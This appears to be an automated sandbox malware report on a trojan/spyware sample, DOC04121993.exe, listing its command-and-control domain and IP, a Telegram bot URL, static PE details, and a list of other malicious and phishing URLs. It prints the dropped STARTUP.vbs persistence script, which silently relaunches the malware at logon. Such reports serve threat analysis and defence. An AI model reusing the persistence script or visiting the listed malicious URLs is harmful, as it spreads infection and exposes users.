https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
http://ocsp.int-x3.letsencrypt.org0/ | 0% | URL Reputation | safe
http://ocsp.int-x3.letsencrypt.org0/ | 0% | URL Reputation | safe
http://ocsp.int-x3.letsencrypt.org0/ | 0% | URL Reputation | safe
http://ocsp.int-x3.letsencrypt.org0/ | 0% | URL Reputation | safe
http://cps.root-x1.letsencrypt.org0 | 0% | URL Reputation | safe
http://cps.root-x1.letsencrypt.org0 | 0% | URL Reputation | safe
http://cps.root-x1.letsencrypt.org0 | 0% | URL Reputation | safe
http://cps.root-x1.letsencrypt.org0 | 0% | URL Reputation | safe
http://vd2JBRKVM6n.net$ | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
hybridgroupco.com | 66.70.204.222 | true | true |  | unknown
mail.hybridgroupco.com | unknown | unknown | true |  | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1: | DOC04121993.exe, DOC04121993.exe, 00000007.00000002.223712280.0000000000475000.00000040.00000001.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/ | DOC04121993.exe | false | 4x URL Reputation: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/U | DOC04121993.exe, 00000000.00000002.199767698.0000000002705000.00000040.00000001.sdmp, DOC04121993.exe, 00000002.00000002.462629290.0000000000402000.00000040.00000001.sdmp, DOC04121993.exe, 00000005.00000002.229601884.00000000027C5000.00000040.00000001.sdmp, DOC04121993.exe, 00000007.00000002.223712280.0000000000475000.00000040.00000001.sdmp | false | 4x URL Reputation: safe | unknown
http://vd2JBRKVM6n.net | DOC04121993.exe, 00000002.00000002.467888799.0000000002B70000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://cps.letsencrypt.org0 | DOC04121993.exe, 00000002.00000002.468167788.0000000002C9E000.00000004.00000001.sdmp | false | 4x URL Reputation: safe | unknown
https://api.telegram.org/bot%telegramapi%/ | DOC04121993.exe, DOC04121993.exe, 00000007.00000002.223712280.0000000000475000.00000040.00000001.sdmp | false |  | high
http://cert.int-x3.letsencrypt.org/0 | DOC04121993.exe, 00000002.00000002.468167788.0000000002C9E000.00000004.00000001.sdmp | false |  | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | DOC04121993.exe | false | 4x URL Reputation: safe | unknown
http://ocsp.int-x3.letsencrypt.org0/ | DOC04121993.exe, 00000002.00000002.468167788.0000000002C9E000.00000004.00000001.sdmp | false | 4x URL Reputation: safe | unknown
http://cps.root-x1.letsencrypt.org0 | DOC04121993.exe, 00000002.00000002.468167788.0000000002C9E000.00000004.00000001.sdmp | false | 4x URL Reputation: safe | unknown
http://vd2JBRKVM6n.net$ | DOC04121993.exe, 00000002.00000002.467655668.0000000002A92000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
66.70.204.222 | unknown | Canada | 16276 | OVHFR | true

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 321396
Start date: 21.11.2020
Start time: 10:35:20
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 8s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: DOC04121993.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 32
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@16/2@1/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 90.3% (good quality ratio 87.7%)
• Quality average: 84.7%
• Quality standard deviation: 25%
HCA Information:
• Successful, ratio: 75%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
• Excluded IPs from analysis (whitelisted): 52.147.198.201, 52.255.188.83, 104.42.151.234, 51.104.139.180, 92.122.213.247, 92.122.213.194, 92.122.144.200, 20.54.26.129, 51.104.144.132, 51.11.168.160
• Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs.microsoft.com, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
10:36:07 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTUP.vbs
10:36:22 | API Interceptor | 824x Sleep call for process: DOC04121993.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection
66.70.204.222 | PI.exe | malicious
 | d9f83622ec1564600202a937d2414af8.exe | malicious
 | Image001.exe | malicious
 | mEPbT6Dbzc.exe | malicious
 | b32sUgpVdT.exe | malicious
 | ZXeB2BO1Lq.exe | malicious
 | kiGANMAmR3.exe | malicious
 | QM34U1x8I6.exe | malicious
 | Y2UrKCOaJm.exe | malicious
 | SJAOO8OCe3.exe | malicious
 | zh7966Pn0I.exe | malicious
 | o7B4zT1WNb.exe | malicious
 | emMAbUc8Xg.exe | malicious
 | a2onj1GOHs.exe | malicious
 | RDp6VoVSfQ.exe | malicious
 | DUE_INVOICE.exe | malicious
 | 2M3ZdRze7b.exe | malicious
 | 36n0FgVGxo.exe | malicious
 | ErKsKTqlS4.exe | malicious
 | yrPgLCinv1.exe | malicious

Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

ASN

Match | Associated Sample Name / URL | Detection | Context
OVHFR | PI.exe | malicious | 66.70.204.222
 | https://faxfax.zizera.com/remittanceadvice | malicious | 167.114.119.127
 | https://coralcliffs.com.do/review/ | malicious | 188.165.231.37
 | https://rugbysacele.ro/zz/IK/of1/nhctfwp4x278qkbusvijl6z39y5ema1o0gdr597irqhw4x0fk3uevzlaoj12bdmpsnt8g6yce40h6iv7bprsowxd3z2nmu8kal5gcj1yf9qt?data=dmluY2VudC5kdXNvcmRldEBpbWQub3Jn#aHR0cHM6Ly9ydWdieXNhY2VsZS5yby96ei9JSy9vZjEvNDUzMjY3NzY4JmVtYWlsPXZpbmNlbnQuZHVzb3JkZXRAaW1kLm9yZw== | malicious | 51.195.133.190
 | http://flossdental.com.au | malicious | 46.105.201.240
 | https://bit.ly/2UDM1To | malicious | 54.38.220.151
 | inquiry-010.14.2020.doc | malicious | 94.23.162.163
 | http://WWW.ALYSSA-J-MILANO.COM | malicious | 51.89.9.253
 | http://septterror.tripod.com/the911basics.html | malicious | 51.89.9.253
 | https://winnersoft.lu/systemadmin/?12= | malicious | 91.121.74.46
 | https://carolearmstrongrealestate.com/wpe/14ea332d0684051d9fef033a5f1607dd?usr=cnBlbmRsZXRvbkBkYXRlc3dlaXNlci5jb20= | malicious | 51.38.157.153
 | Order specs19.11.20.exe | malicious | 51.195.43.214
 | QUOTE.exe | malicious | 51.89.1.123
 | ORDER INQUIRY.exe | malicious | 51.91.236.193
 | KYC_DOC_.EXE | malicious | 51.79.191.17
 | MV GRAN LOBO 008.xlsx | malicious | 188.165.53.185
 | MV GRAN LOBO 008.xlsx | malicious | 188.165.53.185
 | d9f83622ec1564600202a937d2414af8.exe | malicious | 66.70.204.222
 | direct_010.20.doc | malicious | 94.23.162.163
 | #Ud83c#Udfb6 18 November, 2020 Pam.Guetschow@citrix.com.wavv.htm | malicious | 51.210.112.130

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTUP.vbs
Process: C:\Windows\SysWOW64\notepad.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 122
Entropy (8bit): 5.36354376778109
Encrypted: false
SSDEEP: 3:7gwJMr/vtVlmEHhA1FWXp5vhqm77trinRkn:UzPldBA7WXpF8m71i2n
MD5: 863B251962DCEFF8DC4CF0794C51DBD7
SHA1: 639371523C3274C4B3CED14564213AE2AC5F67E7
SHA-256: A2755DC8A8AD6573A09C4E3CD83265747842802D9AA9CD7AF16939FCFF8B17BF
SHA-512: F10460F89A54CF00E9BDE282C776B586901D92921C42B3FC26AA2FBAD4AD5B553DB8F9DC476BEFADCDC6F83838C9A0AB2AF25CEB99F7766CFDE335AB042ED96D
Malicious: true
Reputation: low
Preview: seT ODikjwDxemlA = cREAtEobJect("wsCrIpt.ShEll")..OdIkjWdxemlA.run """C:\Users\user\Desktop\DOC04121993.exe""", 0, False.

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.879727497186752
TrID:
• Win32 Executable (generic) a (10002005/4) 99.66%
• Win32 Executable Delphi generic (14689/80) 0.15%
• Windows Screen Saver (13104/52) 0.13%
• Win16/32 Executable Delphi generic (2074/23) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
File name: DOC04121993.exe
File size: 978432
MD5: 710843b45a8e65c939d3ab4fb96d73e4
SHA1: 909799ac70c5a8a472b40579ff0c5bc982979676
SHA256: d0ea8610ecee6c92c50af51c37a0a49f8550768609a08a5a2dcaf98bb06dcff3
SHA512: 04508620bcb1d8406cddcd0ae1dd9f0c31f27ad6e5c140fba402a0c5951901ae62e0f006a35e897f101cac36849981b8379585f906c5db0ef8f4686e7fb8acbc
SSDEEP: 12288:NuhWgv/dKx2k3bue05YyZVr0ZEs+ihR6JL4o9YWg/XLq7XJK/hmlYpOo5WpxIp:Nwz1Kx2k3T0jZGOL7JLBiWgk508lGQKp
File Content Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon

Icon Hash: eaee8e96b2a8e0b2

Static PE Info

General

Entrypoint: 0x470d00
Entrypoint Section: CODE
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp: 0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 429b4d8f1079c5bb87cad5efdb4eabf0

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  add esp, FFFFFFF0h
                                                                  mov eax, 00470B08h
                                                                  call 00007F0B54E286EDh
                                                                  mov eax, dword ptr [00489FACh]
                                                                  mov eax, dword ptr [eax]
                                                                  call 00007F0B54E7D715h
                                                                  mov ecx, dword ptr [0048A0A4h]
                                                                  mov eax, dword ptr [00489FACh]
                                                                  mov eax, dword ptr [eax]
                                                                  mov edx, dword ptr [004705ACh]
                                                                  call 00007F0B54E7D715h
                                                                  mov eax, dword ptr [00489FACh]
                                                                  mov eax, dword ptr [eax]
                                                                  call 00007F0B54E7D789h
                                                                  call 00007F0B54E261E4h
                                                                  lea eax, dword ptr [eax+00h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8c000 | 0x2496 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x99000 | 0x5b424 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x91000 | 0x7b70 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x90000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x6fd48 | 0x6fe00 | False | 0.517266061453 | data | 6.51621253086 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
DATA | 0x71000 | 0x19130 | 0x19200 | False | 0.189841806592 | data | 2.85009273727 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
BSS | 0x8b000 | 0xcb1 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata | 0x8c000 | 0x2496 | 0x2600 | False | 0.352796052632 | data | 4.9419643729 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls | 0x8f000 | 0x10 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata | 0x90000 | 0x18 | 0x200 | False | 0.048828125 | data | 0.186582516435 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0x91000 | 0x7b70 | 0x7c00 | False | 0.575321320565 | data | 6.64623366609 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0x99000 | 0x5b424 | 0x5b600 | False | 0.776162790698 | data | 7.33023350526 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_CURSOR | 0x99ed8 | 0x134 | data | |
RT_CURSOR | 0x9a00c | 0x134 | data | |
RT_CURSOR | 0x9a140 | 0x134 | data | |
RT_CURSOR | 0x9a274 | 0x134 | data | |
RT_CURSOR | 0x9a3a8 | 0x134 | data | |
RT_CURSOR | 0x9a4dc | 0x134 | data | |
RT_CURSOR | 0x9a610 | 0x134 | data | |
RT_BITMAP | 0x9a744 | 0x1d0 | data | |
RT_BITMAP | 0x9a914 | 0x1e4 | data | |
RT_BITMAP | 0x9aaf8 | 0x1d0 | data | |
RT_BITMAP | 0x9acc8 | 0x1d0 | data | |
RT_BITMAP | 0x9ae98 | 0x1d0 | data | |
RT_BITMAP | 0x9b068 | 0x1d0 | data | |
RT_BITMAP | 0x9b238 | 0x1d0 | data | |
RT_BITMAP | 0x9b408 | 0x1d0 | data | |
RT_BITMAP | 0x9b5d8 | 0x472f5 | data | English | United States
RT_BITMAP | 0xe28d0 | 0x1d0 | data | |
RT_BITMAP | 0xe2aa0 | 0xc0 | GLS_BINARY_LSB_FIRST | |
RT_BITMAP | 0xe2b60 | 0xd8 | data | |
RT_BITMAP | 0xe2c38 | 0xe0 | GLS_BINARY_LSB_FIRST | |
RT_BITMAP | 0xe2d18 | 0xe0 | GLS_BINARY_LSB_FIRST | |
RT_BITMAP | 0xe2df8 | 0xe0 | GLS_BINARY_LSB_FIRST | |
RT_BITMAP | 0xe2ed8 | 0xc0 | GLS_BINARY_LSB_FIRST | |
RT_BITMAP | 0xe2f98 | 0xc0 | GLS_BINARY_LSB_FIRST | |
RT_BITMAP | 0xe3058 | 0xe0 | GLS_BINARY_LSB_FIRST | |
RT_BITMAP | 0xe3138 | 0xd8 | data | |
RT_BITMAP | 0xe3210 | 0xd8 | data | |
RT_BITMAP | 0xe32e8 | 0xc0 | GLS_BINARY_LSB_FIRST | |
RT_BITMAP | 0xe33a8 | 0xd8 | data | |
RT_BITMAP | 0xe3480 | 0xe0 | GLS_BINARY_LSB_FIRST | |
RT_BITMAP | 0xe3560 | 0xd8 | data | |
RT_BITMAP | 0xe3638 | 0xe8 | GLS_BINARY_LSB_FIRST | |
RT_BITMAP | 0xe3720 | 0xc0 | GLS_BINARY_LSB_FIRST | |
RT_BITMAP | 0xe37e0 | 0xe0 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0xe38c0 | 0xd228 | data | |
RT_ICON | 0xf0ae8 | 0x8a8 | data | English | United States
RT_DIALOG | 0xf1390 | 0x52 | data | |
RT_STRING | 0xf13e4 | 0x194 | data | |
RT_STRING | 0xf1578 | 0x2b0 | data | |
RT_STRING | 0xf1828 | 0xdc | data | |
RT_STRING | 0xf1904 | 0x17c | data | |
RT_STRING | 0xf1a80 | 0x1f0 | data | |
RT_STRING | 0xf1c70 | 0x4ac | data | |
RT_STRING | 0xf211c | 0x39c | data | |
RT_STRING | 0xf24b8 | 0x378 | data | |
RT_STRING | 0xf2830 | 0x418 | data | |
RT_STRING | 0xf2c48 | 0xf4 | data | |
RT_STRING | 0xf2d3c | 0xc4 | data | |
RT_STRING | 0xf2e00 | 0x2e0 | data | |
RT_STRING | 0xf30e0 | 0x35c | data | |
RT_STRING | 0xf343c | 0x2b4 | data | |
RT_RCDATA | 0xf36f0 | 0x10 | data | |
RT_RCDATA | 0xf3700 | 0x280 | data | |
RT_RCDATA | 0xf3980 | 0x841 | Delphi compiled form 'TForm1' | |
RT_GROUP_CURSOR | 0xf41c4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
RT_GROUP_CURSOR | 0xf41d8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
RT_GROUP_CURSOR | 0xf41ec | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
RT_GROUP_CURSOR | 0xf4200 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
RT_GROUP_CURSOR | 0xf4214 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
RT_GROUP_CURSOR | 0xf4228 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
RT_GROUP_CURSOR | 0xf423c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
RT_GROUP_ICON | 0xf4250 | 0x14 | data | English | United States
RT_GROUP_ICON | 0xf4264 | 0x14 | data | |
                                                                  RT_HTML0xf42780x1a9dataEnglishUnited States

Imports

DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtectEx, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVolumeInformationA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemTime, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileAttributesA, GetDriveTypeA, GetDiskFreeSpaceA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
mpr.dll | WNetGetConnectionA
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWindowExtEx, SetWinMetaFileBits, SetViewportOrgEx, SetViewportExtEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, Polyline, PolyPolyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExtTextOutA, ExtCreatePen, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll | WindowFromPoint, WinHelpA, WaitMessage, ValidateRect, UpdateWindow, UnregisterClassA, UnionRect, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetMenuItemInfoA, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, IsCharAlphaNumericA, IsCharAlphaA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCaretPos, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EndPaint, EndDeferWindowPos, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DeferWindowPos, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreateWindowExA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, BeginDeferWindowPos, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayRedim, SafeArrayCreate, VariantChangeTypeEx, VariantCopyInd, VariantCopy, VariantClear, VariantInit
comctl32.dll | ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
kernel32.dll | MulDiv

Possible Origin

Language of compilation system | Country where language is spoken
